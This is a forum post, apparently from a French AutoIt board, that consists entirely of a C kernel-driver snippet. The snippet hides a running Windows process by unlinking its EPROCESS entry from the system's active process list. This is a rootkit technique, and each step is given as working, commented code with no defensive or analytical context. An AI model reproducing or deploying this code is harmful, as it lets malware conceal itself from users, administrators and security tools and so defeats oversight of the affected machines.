AutoIt Français

Code : Tout sélectionner

01  if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){ //get EPROCESSstruct for the process we want to hide
02      DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
03      DbgPrint("Now hiding process %d...\n", hps->uPid);
04      dwEProcAddr = (ULONG) pEProc; //get address of process's EPROCESS struct
05      __try{ //try/except just in case, so we don't get a BSOD
06          pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset); //pListProcs is a LIST_ENTRY struct, which is set to the LIST_ENTRY struct
07                                                                            //in the process being hidden (uLinkOffset varies between 2k and XP)
08          *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink);   //set flink of prev proc to flink of cur proc
09          *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
10          pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
11          pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
12          DbgPrint("Process now hidden.\n");
13      }__except(EXCEPTION_EXECUTE_HANDLER){
14          NtStatus = GetExceptionCode();
15          DbgPrint("Exception: %d.\n", NtStatus);
16      }
17      NtStatus = STATUS_SUCCESS;
18  }